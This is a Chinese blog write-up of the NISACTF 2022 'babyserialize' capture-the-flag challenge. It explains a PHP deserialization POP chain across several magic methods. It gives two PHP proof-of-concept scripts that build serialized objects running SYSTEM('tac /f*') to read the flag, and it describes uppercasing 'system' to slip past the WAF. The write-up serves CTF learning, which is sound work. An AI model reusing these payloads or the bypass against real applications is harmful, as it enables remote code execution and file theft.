[NISACTF 2022]babyserialize

最新推荐文章于 2024-06-28 14:59:36 发布
最新推荐文章于 2024-06-28 14:59:36 发布
阅读量368 收藏 1
点赞数 1
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61155226/article/details/130979132
版权 
解法一.构造POP链

(1)eval反推到__invoke
这里先看到eval,而eval中的变量可控,所以肯定是代码执行,而eval又在__invoke魔术方法中。
__invoke魔术方法是对象被当做函数进行调用的时候所触发
这里就反推看哪里用到了类似$a()这种的。

(2)__invoke反推到__toString
在Ilovetxw类的toString方法中,返回了return $bb;
__ToString方法,是对象被当做字符串的时候进行自动调用
  
(3)__toString反推到__set
在four的__set中,调用了strolower方法。如果不清楚,可以具体看下文档。
  
(4)从__set反推到__call
__set:对不存在或者不可访问的变量进行赋值就自动调用
__call:对不存在的方法或者不可访问的方法进行调用就自动调用
这里反推到Ilovetxw中的__call方法,而__call方法又可直接反推到TianXiWei中的__wakeup

整体流程思路 :

Class NISA -> __invoke()

Class Ilovetxw -> __toString()

Class four -> __set()

Class Ilovetxw -> __call()

Class TianXiWei -> __wakeup()

由于上面的思路是倒推出的,所以编写POC的时候,要反着编写;

<?php
class NISA{
    public $fun;
    public $txw4ever='SYSTEM("tac /f*");';
}

class TianXiWei{
    public $ext;
    public $x;
}

class Ilovetxw{
    public $huang;
    public $su;
}

class four{
    public $a;
    private $fun;
}
$a=new tianxiwei;
$a->ext=new ilovetxw;
$a->ext->huang=new four;
$a->ext->huang->a=new ilovetxw;
$a->ext->huang->a->su=new nisa;
echo urlencode(serialize($a));

然后将 system 改成 大写,绕过WAF即可;

解法二.弱类型比较

在NISA::__wakeup里,做弱比较的时候就能触发__toString

class NISA{
    public $txw4ever='SYSTEM("cat /f*");';
}
class Ilovetxw{
}

$a = new NISA();
$a->fun = new Ilovetxw();
$a->fun->su = $a;
$a = serialize($a);
echo $a;

 

SlackMoon
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[NISACTF 2022]babyserialize - 反序列化(waf绕过)【*】
oZuoShen123的博客
10-07 1021
1、分析链条和属性   链条:`TianXiWeis(__wakeup)-> Ilovetxw(__call)-> four(__set) -> Ilovetxw(__toString)-> NISA(__invoke)`   属性:`TianXiWeis(ext=$i)-> Ilovetxw(huang=$f)-> four(fun="sixsixsix";a=$i)-> Ilovetxw(su=$n)-> NISA(txw4ever=命令)`
[NISACTF 2022]
snowlyzz的博客
09-09 6155
NISACTF部分WP
关于[NISACTF 2022]babyserialize详解
weixin_57222016的博客
05-06 2433
前言 先甩出PHP的魔术方法。 __invoke():当尝试以调用函数的方式调用对象的时候,就会调用该方法 __construst():具有构造函数的类在创建新对象的时候,回调此方法 __destruct():反序列化的时候,或者对象销毁的时候调用 __wakeup():反序列化的时候调用 __sleep():序列化的时候调用 __toString():把类当成字符串的时候调用,一般在echo处生效 __set():在给不可访问的(protected或者private)或者不存在的属性赋值的时候,会被调用
pop链构造 [NISACTF 2022]babyserialize
m0_75178803的博客
02-26 1098
打开题目题目源代码如下代码审计一下//定义了一个名为NISA的类//检查$this->fun是否等于 "show_me_flag",如果是,则调用hint()函数hint();//当对象的方法不存在时,__call()$from表示调用的方法名,$val是一个数组,包含调用方法时传递的参数//将对象的属性$this->fun设置为传递给方法的第一个参数的值,即$val[0]return " ";//使用echo语句输出对象的属性。
NSSCTF-Web题目18(反序列化)
最新发布
weixin_54055099的博客
06-28 817
PHP反序列化,绕过过滤
[NISACTF 2022]babyserialize(pop链构造与脚本编写详细教学)
Welcome To Myon'Blog !
07-06 1669
一、理清pop链并进行标注 二、如何编写相关脚本 三、过滤与绕过 1、waf的绕过 2、preg_match的绕过
[NISACTF 2022]上
qq_62046696的博客
07-26 3965
在php中变量名字是由数字字母和下划线组成的,所以不论用post还是get传入变量名的时候都将空格、+、点、[转换为下划线,但是用一个特性是可以绕过的,就是当[提前出现后,后面的点就不会再被转义了,suchas`CTF[SHOW.COM`=>`CTF_SHOW.COM`打开界面本来以为是简单的get传参,结果发现有的字符不能选中,选了好几下也不可以很蹊跷,仅仅想到了可能是代替的一些东西吧,然后csdn了一下。array1[]=1&array2[]=2本来觉得数组绕过就可以可是,发现输出了?...
关于ctf反序列化题的一些见解([MRCTF2020]Ezpop以及[NISACTF 2022]babyserialize
whale_waves的博客
12-14 1278
这里对php反序列化做简单了解 在PHP中,序列化用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构。 serialize()函数序列化对象后,可以很方便的将它传递给其他需要它的地方,且其类型和结构不会改变 如果想要将已序列化的字符串变回 PHP 的值,可使用用unserialize() 当在反序列化后不同的变量和引用方法会调出不同的php魔法函数 php魔法函数 __wakeup():在执行unserialize时,会最先调用这个函数 __sleep():在执行serialize
NISACTF2022公开通道
as you know, nlp is fantasitc!
03-29 4939
NISACTF2022公开通道checkinlevel_up第一层 robots.txt第二层 md5碰撞第三层 sha1碰撞第四层 parse_url解析漏洞第五层create_function()注入bingdundunbabyserializebabyuploadeasyssrfis secret(原题)popchain(原题)middlevel(原题) 题目 checkin urlencode,因为解释器读取出来的才是真正的顺序 ahahahaha=jitanglailo&&%E2%
NSSCTF web题记录
m0_64815693的博客
11-08 1万+
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生赛]babyunser [TQLCTF 2022]simple_bypass
NSSCTF web学习
akxnxbshai的博客
09-30 1242
NSSCTF web刷题
NISACTF 2022 writeup
热门推荐
st1cky的博客
03-29 3万+
周末两天的比赛 WEB(11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12) WEB没有AK还是略有遗憾,到后面实在做不动了。 第一次写这么长的WP… WEB checkin <?php error_reporting(0); include "flag.php"; // ‮⁦NISACTF⁩⁦Welcome to if ("jitanglailo" == $_GET[ahahahaha] &‮⁦+!!⁩⁦& "‮⁦ Flag!.
[ACTF_Junior_2021] web wp
Huamang的博客
02-21 1607
baby_serialize 一题基础的反序列化 代码审计,当Username为admin的时候就给flag <?php highlight_file(__FILE__); include "flag.php"; class User{ private $Username = "0xDktb"; private $Password = "0xDktb111"; function __construct(){ $Username = "0xDktb";
UNCTF2021-easyserialize
m0_61666690的博客
12-07 536
前言 算是第一次独立做出来的一道web题,想了我两天。。。 本题利用到的知识点: 1.PHP反序列化字符逃逸 UNCTF2020的一道easyunserialize,类似 2.目录穿越 UNCTF2020的一道easy_ssrf,类似 3.pop链 BUUCTF的ezpop,类似 灵感就来源于这两道题 一、源码 二、POP链构造 1.function.php 先看哪里可以利用到flag 可以看到me7eorite这个类里有readfile函数,可以用来读flag 但是有
[NISACTF 2022]WriteUp web篇
Pysnow's Blog
04-01 4676
[NISACTF 2022] WEB checkin 打开一看,本来一位就是简单的一道get传参题,结果发现复制的时候出现了问题 所以我就把代码复制到vscode上面来 发现存在Unicode特殊字符,直接把字符原样复制下来,然后URLencode编码一下 最终payload ?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%
invoke方法_PHP中__invoke()方法详解
weixin_39598796的博客
12-01 6628
php中文网最新课程每日17点准时技术干货分享__invoke(),调用函数的方式调用一个对象时的回应方法作用:当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用。注意:本特性只在 PHP 5.3.0 及以上版本有效。直接上代码:class Person{public $sex;public $name;public $age;p...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值